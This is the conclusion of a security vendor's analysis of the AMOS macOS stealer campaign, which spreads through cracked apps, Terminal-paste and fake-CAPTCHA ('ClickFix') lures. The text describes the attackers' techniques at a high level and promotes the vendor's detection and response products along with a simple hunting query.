An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via ‘Cracked’ Apps
Conclusion
Our analysis revealed a sophisticated multistage attack that relies on social engineering to trick victims, uses domain rotation techniques to evade detection, and employs adaptive delivery methods to increase the chance of infecting the system. These highlight the importance of comprehensive endpoint detection and response capabilities that can correlate behaviors across different attack stages (initial execution, persistence, and data exfiltration) and flag suspicious activity proactively.
The AMOS campaign also demonstrates significant tactical adaptation in response to Apple’s security improvements. While macOS Sequoia’s enhanced Gatekeeper protections successfully blocked traditional .dmg-based infections, threat actors quickly pivoted to terminal-based installation methods that proved more effective in bypassing security controls. This shift highlights the importance of defense-in-depth strategies that don’t rely solely on built-in operating system protections.
Telemetry and workbench capabilities in Trend Vision One provided deep forensic analysis of the attack chain, from initial compromise to data exfiltration. This visibility allowed the security team to understand not just what happened, but how the attack progressed and what data was potentially exposed. This kind of visibility is critical for organizations, because it provides actionable knowledge. It supports incident response by showing what was or could be compromised, strengthens defenses by highlighting the techniques that need closer monitoring, and informs user awareness by revealing where employees are most likely to be tricked by social engineering tactics.
AMOS and similar threats will continue leaning on social engineering instead of relying on technical attacks. This could include the heavy use of malvertising on legitimate platforms like Google Ads as well as search engine optimization (SEO) poisoning to push fake installers to the top of search results. Whie these sites don’t always perfectly mirror legitimate pages, they might be convincing enough to mislead users who trust search rankings or act without checking the source.
Attackers may continue to abuse of living-off-the-land binaries (LOLBins) on macOS using such methods as osascript, curl, and AppleScript. Attackers may also use stronger obfuscation to evade detection and attempt to bypass Apple’s security features, including Gatekeeper, perhaps using stolen or fake developer certificates.
Another method seen recently is the use of fake CAPTCHAs or “ClickFix” campaigns. Here, users are prompted with a supposed “human verification” step that instructs them to copy and paste a malicious command into their macOS Terminal. Doing so bypasses macOS’s built-in security features, such as Gatekeeper. By shifting execution to the user, attackers reduce their effort while still increasing the likelihood of successful infection.
MDR delivers round-the-clock monitoring, intelligent threat hunting, and swift incident response capabilities that identify and neutralize threats before they can cause substantial harm. Against sophisticated campaigns employing evasive techniques, fileless execution, and social engineering tactics, MDR excels by correlating real-time telemetry from endpoints, network infrastructure, and user activities into a unified threat picture. This comprehensive visibility enables security teams to spot subtle anomalies — from suspicious script execution sequences to irregular process behaviors — and execute immediate containment measures that disrupt attack progression at critical junctures.
Trend Vision One™ Threat Intelligence
To stay ahead of evolving threats, Trend Micro customers can access Trend Vision One™ Threat Insights which provides the latest insights from Trend Research on emerging threats and threat actors.
Trend Vision One Threat Insights
Trend Vision One Intelligence Reports (IOC Sweeping)
Hunting Queries
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.
Atomic MacOS Stealer VSAPI Detection
malName: *.AMOS.* AND eventName: MALWARE_DETECTION
More hunting queries are available for Trend Vision One customers with Threat Insights entitlement enabled.
Indicators of Compromise
The indicators of compromise for this entry can be found here.
Read More HERE
